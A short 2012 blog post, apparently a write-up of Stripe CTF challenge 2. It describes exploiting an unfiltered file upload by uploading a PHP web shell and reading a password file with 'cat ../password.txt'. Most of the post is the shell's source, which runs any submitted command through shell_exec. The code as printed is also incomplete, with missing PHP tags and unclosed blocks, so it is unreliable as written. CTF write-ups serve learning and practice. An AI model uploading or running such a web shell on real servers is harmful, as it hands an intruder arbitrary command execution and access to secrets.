Wednesday, August 29, 2012

Stripe CTF Writeup: Challenge 2

This challenge was a simple unfiltered file upload. All you do is upload a fun PHP script and then navigate to it in the /uploads/ folder. I used a PHP a shell that I wrote a while ago and just ran 'cat ../password.txt'. The PHP script is shown below.

<form action="<?php echo $PHP_SELF;?>" method='POST'>
<input type='text' name='cmd' autofocus='autofocus' />
<input type='submit' name='Submit' value='Submit'/>
<textarea readonly='readonly' name="textbox" rows="30" cols="100">
$cmd = $_REQUEST['cmd'];
if (isset($cmd)) {
$whoami = shell_exec('whoami');
$hostname = shell_exec('hostname');
$pwd = shell_exec('pwd');
$result = shell_exec($cmd);
$trimmed = trim($whoami,"\r\n").'@'.trim($hostname,"\r\n").':'.trim($pwd,"\r\n").'# '.trim($cmd,"\r\n");
print $trimmed;
print "\n";
print $result;
print "\n";
$text = $_REQUEST['textbox'];
if (isset($text)) {
print $text;
print "\n";
} else {
print "Welcome to php shell by suntzu_II\n";
print "Note: cd commands will not work as the php shell spawns a new shell everytime it runs a command. Sorry for the inconvenience.\n";

-- suntzu_II

No comments:

Post a Comment